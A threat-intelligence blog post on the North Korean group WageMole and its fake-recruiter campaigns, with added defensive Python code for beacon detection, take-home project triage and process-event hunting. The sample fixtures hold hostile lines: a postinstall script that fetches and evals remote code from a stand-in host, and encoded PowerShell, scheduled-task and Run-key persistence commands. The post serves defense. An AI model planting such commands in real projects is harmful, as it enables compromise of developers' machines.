Inside WageMole: North Korea’s Fusion of Cybercrime and Espionage

Introduction

WageMole, tracked under aliases including Nickel Tapestry, Storm-1877, UNC5267, and Famous Chollima, and associated with the Contagious Interview campaign, is a hybrid threat actor attributed to the Democratic People’s Republic of Korea (DPRK). Active since at least 2018, this advanced persistent threat (APT) group combines state-directed intelligence collection with financially motivated cybercrime to fund North Korea’s sanctioned economy. In recent years, WageMole has adapted its social-engineering campaigns, supply-chain attacks, and cryptocurrency theft into operations that serve both its financing and its strategic objectives.

This blog explores WageMole’s origins, development, techniques, and significant campaigns from 2018 to 2025, using case studies to show how the group sits at the intersection of espionage and cybercrime, and what that says about modern statecraft.

Identity and Motivation

WageMole’s activities reflect the dual objectives shared by many DPRK cyber groups: raising revenue for the regime and gathering intelligence on foreign technologies. The group focuses primarily on financial technology (fintech), cryptocurrency, and defense sectors, either to extract funds or to steal intellectual property. Whereas other North Korean clusters operate solely to steal funds or solely to gather intelligence, WageMole combines the two missions and may switch between them as opportunities arise.

The group’s activities align with North Korea’s strategic goal of self-sufficiency in the face of economic sanctions. Proceeds from its campaigns are understood to flow directly into national weapons development programs and other state-sponsored projects. The targets, tactics, and timing of the group’s activity often overlap with significant economic or political events involving North Korea’s regional adversaries.

Tactics, Techniques, and Procedures

WageMole combines technical skill with psychological manipulation. Its tactics evolve quickly, frequently pairing legitimate tools with tailored malware to evade detection.

Initial Access

The group is well known for social engineering on professional networking sites such as LinkedIn. Operators pose as recruiters for well-known technology or defense firms and contact targets in engineering or development roles. These engagements typically lead to a staged interview in which the victim is asked to review malicious documents or complete a test project containing trojanized executables.

Alongside these schemes, WageMole has exploited vulnerable public-facing applications, remote desktop services, and third-party software suppliers. Its supply-chain approach is increasingly sophisticated: by compromising software build environments, the group can have its malware distributed inside otherwise legitimate software updates.

Execution and Persistence

Once initial access is obtained, WageMole drops custom loaders and backdoors that allow remote command execution. The group frequently uses PowerShell and Windows Management Instrumentation (WMI) to execute actions while blending in with administrative activity. Scheduled tasks and registry Run keys provide persistence, so that access to a compromised host survives reboots and partial clean-up.

WageMole also abuses legitimate remote administration tools such as AnyDesk, Atera, and ConnectWise Control. Because IT staff use the same tools, the processes and traffic they generate blend in with normal operations while giving the group a robust, interactive control channel.

Command and Control

The group’s command-and-control (C2) infrastructure is built to blend in with normal enterprise traffic. Communication usually runs over HTTPS, often to cloud services such as Amazon S3 and Google Cloud Storage. Domain fronting and content delivery networks further disguise C2 traffic as routine web activity.
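
The C2 pattern above is hard to catch by destination reputation alone, because the destination is a major cloud provider. The following added example (not code from the original post or from any vendor named in it) shows three checks that work on proxy or firewall logs without decrypting anything: cloud-storage hosts the organization does not use, destinations whose domain was registered recently, and beacon-like regularity between connections from one source to one host. The log format, the allowlist of approved buckets, and the registration dates are constructed for the demonstration; production code would take the registration date from a WHOIS/RDAP or passive-DNS feed.

```python
"""Flag outbound HTTPS that fits the C2 pattern: unapproved cloud-storage hosts,
newly registered domains, and periodic beacons. Added example; log lines,
allowlist and registration dates are constructed."""
import statistics
from collections import defaultdict
from datetime import date, datetime

# Cloud-storage host suffixes that can hide C2 inside 'normal' SaaS traffic
CLOUD_STORAGE_SUFFIXES = (".s3.amazonaws.com", ".storage.googleapis.com")
# Buckets the organization actually uses (assumed allowlist)
ALLOWED_STORAGE_HOSTS = {"corp-backups.s3.amazonaws.com", "corp-assets.storage.googleapis.com"}
# Stand-in for a domain-registration-date feed (constructed values)
REGISTRATION_DATES = {
    "cdn-update-service.com": date(2025, 9, 28),
    "example-saas.net": date(2015, 3, 2),
}

def registrable_domain(host):
    # Naive last-two-label split; real code should use the Public Suffix List
    return ".".join(host.lower().split(".")[-2:])

def parse_proxy_log(lines):
    """Each line: '<utc timestamp> <source host> <destination host> <bytes out>'."""
    events = []
    for line in lines:
        ts, src, dst, bytes_out = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "src": src, "dst": dst.lower(), "bytes_out": int(bytes_out)})
    return events

def is_periodic(timestamps, min_connections=4, max_cv=0.15):
    """A low coefficient of variation between connection intervals is beacon-like."""
    if len(timestamps) < min_connections:
        return False
    ts = sorted(timestamps)
    intervals = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(intervals)
    return mean > 0 and statistics.pstdev(intervals) / mean < max_cv

def analyze(lines, today, max_domain_age_days=30):
    """Return (source, destination, reason) once per source/destination pair."""
    by_pair = defaultdict(list)
    for ev in parse_proxy_log(lines):
        by_pair[(ev["src"], ev["dst"])].append(ev["ts"])
    findings = []
    for (src, dst), stamps in by_pair.items():
        if dst.endswith(CLOUD_STORAGE_SUFFIXES) and dst not in ALLOWED_STORAGE_HOSTS:
            findings.append((src, dst, "unapproved_cloud_storage"))
        registered = REGISTRATION_DATES.get(registrable_domain(dst))
        if registered and (today - registered).days <= max_domain_age_days:
            findings.append((src, dst, "newly_registered_domain"))
        if is_periodic(stamps):
            findings.append((src, dst, "periodic_beacon"))
    return findings

SAMPLE_PROXY_LOG = [  # constructed proxy records
    "2025-10-06T09:00:02Z DEV-042 corp-backups.s3.amazonaws.com 1820",
    "2025-10-06T09:00:05Z DEV-042 cdn-update-service.com 410",
    "2025-10-06T09:05:05Z DEV-042 cdn-update-service.com 412",
    "2025-10-06T09:10:06Z DEV-042 cdn-update-service.com 409",
    "2025-10-06T09:15:05Z DEV-042 cdn-update-service.com 415",
    "2025-10-06T09:03:11Z FIN-007 drop-7f3a.s3.amazonaws.com 2300000",
    "2025-10-06T09:04:40Z FIN-007 api.example-saas.net 5200",
    "2025-10-06T10:22:18Z FIN-007 api.example-saas.net 4800",
]

def analyze_sample():
    return analyze(SAMPLE_PROXY_LOG, date(2025, 10, 6))

if __name__ == "__main__":
    for src, dst, reason in analyze_sample():
        print(f"{src} -> {dst}: {reason}")
```

The beacon check is the one that survives domain fronting: the fronted hostname looks legitimate, but the timing of a sleep-and-poll implant does not. Tune `min_connections` and `max_cv` against your own baseline, since software updaters and monitoring agents also poll on fixed intervals and belong on an allowlist rather than in the findings.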

Data Theft and Monetization

WageMole focuses primarily on stealing cryptocurrency wallets, exchange credentials, and blockchain API keys. Stolen assets must then be converted into fiat currency, so the group launders them through mixers, chain-hopping, and decentralized exchanges. Where it gains access to payment APIs, the group manipulates transactions to divert funds into accounts it controls and cashes them out.

While profit is the primary motive, WageMole also steals proprietary source code, cryptographic implementations, and sensitive defense information. Such theft most likely serves DPRK technology development and intelligence requirements.

Notable Campaigns and Targets

Operation Contagious Interview (2022–2023)

This campaign used fake recruiting efforts aimed at developers and security researchers in the cryptocurrency and fintech ecosystem. Victims were sent a job description and a coding test that delivered customized malware when executed. The campaign demonstrated WageMole’s command of social engineering: each operation was tailored to the professional context of the individual it targeted.
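
The staged-interview lure described under Initial Access and in this campaign relies on the candidate running the test project as delivered. The added example below (written for this page, not code from the original post or from any vendor) is the pre-flight triage a developer or security team can run over a received project before executing anything in it: it looks for native executables under any file extension, install-time hooks that run automatically on dependency install, and dynamic code evaluation or large encoded blobs in source files. The sample project, the assumption that it is a Node project with a package.json, and the indicator patterns are all constructed for the demonstration.

```python
"""Triage a 'coding test' project before running it: native executables hidden
under any extension, install hooks, dynamic code execution, encoded blobs.
Added example; sample project and indicator patterns are constructed."""
import json
import os
import re
import tempfile

# File-type magic for native executables, checked regardless of extension
NATIVE_MAGIC = {b"MZ": "pe", b"\x7fELF": "elf",
                b"\xcf\xfa\xed\xfe": "macho", b"\xca\xfe\xba\xbe": "macho-fat"}
# npm lifecycle scripts that run automatically on install (assumed Node project)
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|require\(\s*['\"]child_process['\"]\s*\)")
LONG_ENCODED_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")

def triage(root):
    """Return sorted (relative path, reason) pairs for everything worth a manual look."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            kind = next((k for magic, k in NATIVE_MAGIC.items() if data.startswith(magic)), None)
            if kind:
                findings.append((rel, f"native_executable:{kind}"))
                continue
            try:
                text = data.decode("utf-8")
            except UnicodeDecodeError:
                continue  # non-UTF-8 data that is not an executable: images, archives
            if name == "package.json":
                try:
                    scripts = json.loads(text).get("scripts", {})
                except ValueError:
                    scripts = {}
                for hook in INSTALL_HOOKS:
                    if hook in scripts:
                        findings.append((rel, f"install_hook:{hook}"))
            if DYNAMIC_EXEC.search(text):
                findings.append((rel, "dynamic_code_execution"))
            if LONG_ENCODED_BLOB.search(text):
                findings.append((rel, "long_encoded_blob"))
    return sorted(findings)

def build_sample_project(root):
    """Write a constructed take-home project: a plausible app plus the kinds of
    additions a trojanized test project would carry."""
    files = {
        "README.md": "# Trading dashboard\nImplement the order book view and run `npm install && npm test`.\n",
        "package.json": json.dumps({"name": "trading-dashboard", "version": "1.0.0",
                                    "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"}}),
        "src/app.js": "module.exports = function render(orders) {\n  return orders.map(o => o.price).join(',');\n};\n",
        "scripts/setup.js": "const cp = require('child_process');\n"
                            "eval(cp.execSync('curl -s https://updates.example.invalid/init').toString());\n",
        "config/keys.js": 'const blob = "' + "QUFB" * 40 + '";\nmodule.exports = blob;\n',
        "assets/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "vendor/prebuilt.node": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56,
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        mode = "wb" if isinstance(content, bytes) else "w"
        with open(path, mode) as fh:
            fh.write(content)

def run_demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_project(root)
        return triage(root)

if __name__ == "__main__":
    for rel, reason in run_demo():
        print(f"{reason:28} {rel}")
```

A hit is a reason to open the project in a disposable VM without credentials or wallets, not proof of malice; a postinstall hook or a prebuilt native module is also how plenty of legitimate packages work. The point of the check is that the decision to run the project is made by the recipient after looking, rather than by the recruiter's instructions.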

Supply Chain Compromises (2024–2025)

Recent reporting from global cybersecurity firms indicates that WageMole has pivoted to compromising software providers in order to reach their downstream customers. In some cases the group gained access to build environments and inserted malware into otherwise trustworthy software updates. This mode of operation is characteristic of more advanced APT activity and illustrates WageMole’s growing technical capability.
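
A compromised build environment produces an artifact that is signed and served by the legitimate supplier, so the consumer-side control that still works is an integrity pin taken when the dependency or update was first vetted. The added example below (not code from the original post or from any vendor) verifies fetched bytes against a Subresource-Integrity-style value, as used in npm lockfiles (an assumption about the ecosystem), accepts only strong algorithms so a weak hash cannot be appended to downgrade the check, and compares digests in constant time. The tarball bytes and lockfile entries are constructed stand-ins.

```python
"""Verify a fetched dependency or update against the integrity value pinned when
it was vetted, rejecting an artifact modified upstream. Added example; SRI
'sha512-<base64>' format follows npm lockfiles; artifact bytes are constructed."""
import base64
import hashlib
import hmac

# Acceptable digest algorithms, weakest to strongest; sha1/md5 are deliberately absent
SUPPORTED = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
STRENGTH = {name: rank for rank, name in enumerate(SUPPORTED)}

def sri_value(data, algo="sha512"):
    """Produce the SRI string a lockfile records for vetted bytes."""
    return f"{algo}-" + base64.b64encode(SUPPORTED[algo](data).digest()).decode("ascii")

def verify_sri(data, integrity):
    """Check bytes against a (possibly space-separated) SRI list. Returns (ok, detail).
    Only the strongest supported algorithm present is used, so appending a weak
    hash cannot downgrade the check."""
    best = None
    for token in integrity.split():
        algo, sep, b64 = token.partition("-")
        if sep and algo in SUPPORTED and (best is None or STRENGTH[algo] > STRENGTH[best[0]]):
            best = (algo, b64)
    if best is None:
        return False, "no acceptable hash algorithm in integrity value"
    algo, b64 = best
    try:
        expected = base64.b64decode(b64, validate=True)
    except ValueError:
        return False, f"{algo} value is not valid base64"
    actual = SUPPORTED[algo](data).digest()
    if len(expected) != len(actual) or not hmac.compare_digest(expected, actual):
        return False, f"{algo} mismatch"
    return True, algo

def audit_artifacts(lockfile, fetched):
    """lockfile: {name: {"integrity": ...}}; fetched: {name: bytes}. Returns {name: (ok, detail)}."""
    results = {}
    for name, entry in lockfile.items():
        blob = fetched.get(name)
        if blob is None:
            results[name] = (False, "artifact not fetched")
            continue
        results[name] = verify_sri(blob, entry["integrity"])
    return results

# Constructed: bytes of a dependency tarball at the time it was vetted, and the
# same tarball after an install-time hook was injected at the supplier's build stage
VETTED_TARBALL = b"\x1f\x8b\x08 trading-dashboard-deps-1.4.2 " + bytes(range(64))
TAMPERED_TARBALL = VETTED_TARBALL + b'"postinstall": "node ./init.js"'
LOCKFILE = {
    "deps-1.4.2": {"integrity": sri_value(VETTED_TARBALL)},
    "legacy-lib": {"integrity": "sha1-2jmj7l5rSw0yVb/vlWAYkK/YBwk="},  # weak pin, rejected
}

def run_demo():
    return audit_artifacts(LOCKFILE, {"deps-1.4.2": TAMPERED_TARBALL, "legacy-lib": b""})

if __name__ == "__main__":
    for name, (ok, detail) in run_demo().items():
        print(f"{name}: {'OK' if ok else 'REJECT'} ({detail})")
```

The check is only as good as the pin: if the lockfile is regenerated from the same compromised registry or update server, the tampered artifact hashes cleanly. Pins therefore have to be captured from a vetted copy and committed, and a change to an `integrity` value in a pull request deserves the same review as a change to the code.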

Cryptocurrency Heists (Ongoing)

Throughout 2024 and 2025, WageMole has carried out numerous heists against cryptocurrency exchanges in North America, Europe, and Asia. Using account credentials obtained through spear-phishing and social engineering, the group exfiltrated digital assets worth millions of dollars. These operations remain one of the DPRK’s major sources of foreign currency.

Recent Developments

WageMole’s evolution mirrors broader trends in North Korean cyber operations. The group now uses artificial intelligence to improve the realism of its phishing lures and other content. AI-generated profiles, resumes, and interview material make fraudulent recruitment attempts harder to distinguish from legitimate ones.

WageMole also continues to refine its infrastructure management. It has begun using a modular framework that spreads delivery, command, and exfiltration stages across independent servers and cloud regions, which complicates both attribution and incident response.

CrowdStrike’s 2025 Global Threat Report, which tracks the group under one of its aliases, Famous Chollima, describes it as an “enterprising adversary”. The label captures a level of professionalism, rapid adaptation, and operational experience in private enterprise that differs from the usual profile of a hacking group.

Strategic Impact

WageMole’s operations expose the blurred boundary between state-sponsored espionage and financially motivated cybercrime. The group is an adaptable instrument of North Korean cyber policy, supporting tactical revenue generation while also serving longer-term intelligence objectives.

The group’s ability to gain access through recruitment processes and development pipelines shows a keen understanding of both human and technical vulnerabilities. By exploiting trust within professional environments, it bypasses perimeter defenses and achieves high-value compromises with comparatively little technical exploitation.

WageMole’s global reach also highlights the difficulty of responding to DPRK cyber operations. Despite extensive international sanctions, the DPRK continues to field technically skilled teams that operate across time zones. Cloud-based infrastructure, anonymization tools, and cryptocurrency laundering networks give these operations resilience and a degree of financial independence.

Defensive Recommendations

Defending against WageMole requires a combination of user awareness, technical controls, and proactive threat hunting.

Implement Cloud and Network Visibility: Examine outbound encrypted traffic for unusual destinations and recently registered domains, including cloud storage endpoints the organization does not normally use.

Verify Recruitment Engagements: Train employees on the risks of unsolicited job offers. Legitimate recruiters communicate through the company’s verified channels and never ask a candidate to install software or run a package during an interview, or to follow links from unknown sources.

Isolate Developer Environments: Continuous integration and delivery (CI/CD) systems should be isolated, monitored, and protected with multi-factor authentication (MFA). All software releases should be code-signed and their integrity verified before deployment.

Monitor for Anomalous Remote Tools: Alert on unexpected AnyDesk, Atera, ConnectWise Control, or VPN installations, especially on finance and development workstations.

Use Behavioral Detection: Tooling that tracks lateral movement, PowerShell execution, and credential theft can reveal WageMole activity even when no signature exists for the malware in use.

Increase Supply Chain Monitoring: Regularly audit vendors and open-source dependencies for tampering or malicious commits.
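
The behavioral and remote-tool recommendations above, together with the execution and persistence techniques described earlier (PowerShell and WMI execution, scheduled tasks, registry Run keys, AnyDesk, Atera, and ConnectWise Control), reduce to a handful of checks over process-creation telemetry. The added example below (written for this page, not code from the original post or from any EDR vendor) runs those checks over constructed events. The `key=value|...` record format, the host-naming convention that marks finance and developer workstations, and the sample events are assumptions for the demonstration; the executable names are the tools' real client binaries.

```python
"""Behavioral checks over process-creation events: encoded PowerShell, WMI-spawned
shells, scheduled-task and Run-key persistence, remote-admin tools on sensitive
hosts. Added example; record format, host naming and events are constructed."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str   # parent process image path
    image: str    # new process image path
    cmdline: str

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# Assumed asset-naming convention: finance and developer workstations
SENSITIVE_HOST_PREFIXES = ("FIN-", "DEV-")
# Client binaries of the remote administration tools the post names (ConnectWise
# Control's client executables still carry the ScreenConnect name)
RMM_IMAGES = {"anydesk.exe", "ateraagent.exe", "screenconnect.clientservice.exe",
              "screenconnect.windowsclient.exe"}
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.IGNORECASE)
RUN_KEY = re.compile(r"currentversion\\run(?:once)?\b", re.IGNORECASE)

RULES = {
    "encoded_powershell": lambda e: basename(e.image) in ("powershell.exe", "pwsh.exe")
                                    and ENCODED_FLAG.search(e.cmdline) is not None,
    "wmi_spawned_shell": lambda e: basename(e.parent) == "wmiprvse.exe"
                                   and basename(e.image) in ("cmd.exe", "powershell.exe", "pwsh.exe"),
    "schtask_persistence": lambda e: basename(e.image) == "schtasks.exe"
                                     and "/create" in e.cmdline.lower(),
    "runkey_persistence": lambda e: basename(e.image) == "reg.exe"
                                    and " add " in e.cmdline.lower()
                                    and RUN_KEY.search(e.cmdline) is not None,
    "rmm_on_sensitive_host": lambda e: basename(e.image) in RMM_IMAGES
                                       and e.host.upper().startswith(SENSITIVE_HOST_PREFIXES),
}

def parse_event(line):
    fields = dict(kv.split("=", 1) for kv in line.split("|"))
    return ProcEvent(**fields)

def classify(event):
    return [name for name, matches in RULES.items() if matches(event)]

def hunt(lines):
    """Return (host, rule, image basename) for every event that trips a rule."""
    findings = []
    for line in lines:
        event = parse_event(line)
        for rule in classify(event):
            findings.append((event.host, rule, basename(event.image)))
    return findings

SAMPLE_EVENTS = [  # constructed process-creation records
    r"host=DEV-042|user=CORP\jdoe|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe -nop -w hidden -enc SQBFAFgA",
    r"host=FIN-007|user=CORP\asmith|parent=C:\Windows\System32\wbem\WmiPrvSE.exe|image=C:\Windows\System32\cmd.exe|cmdline=cmd.exe /c whoami",
    r"host=DEV-042|user=CORP\jdoe|parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\schtasks.exe|cmdline=schtasks.exe /create /sc onlogon /tn Updater /tr C:\Users\jdoe\AppData\Roaming\upd.exe",
    r"host=DEV-042|user=CORP\jdoe|parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\reg.exe|cmdline=reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\jdoe\AppData\Roaming\upd.exe",
    r"host=FIN-007|user=CORP\asmith|parent=C:\Users\asmith\Downloads\AnyDesk.exe|image=C:\Users\asmith\AppData\Roaming\AnyDesk\AnyDesk.exe|cmdline=AnyDesk.exe --service",
    r"host=IT-HELPDESK-01|user=CORP\helpdesk|parent=C:\Windows\explorer.exe|image=C:\Program Files (x86)\AnyDesk\AnyDesk.exe|cmdline=AnyDesk.exe",
    r"host=DEV-042|user=CORP\jdoe|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe -File C:\scripts\build.ps1",
]

if __name__ == "__main__":
    for host, rule, image in hunt(SAMPLE_EVENTS):
        print(f"{host:16} {rule:24} {image}")
```

None of these rules depends on a malware hash, which is the point of the behavioral recommendation: the loader changes, the persistence mechanism and the tooling do not. The remote-tool rule deliberately keys on host role rather than on the binary alone, because the same AnyDesk executable on a helpdesk machine is expected and produces no finding.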

Conclusion

WageMole represents the next variant of North Korean cyber capability: agile, adaptable, and entrepreneurial. It is at once a state intelligence asset and a financial engine for a sanctioned regime. Its ability to weaponize professional trust and exploit society’s dependence on digital networks illustrates the complexity of the contemporary cyber threat landscape.

As WageMole continues to evolve through 2025 and beyond, organizations must invest in behavioral detection, credential protection, and human-centered defenses. Understanding how this actor combines social manipulation with technical precision is essential to anticipating and defending against the threats it poses to the global digital economy.
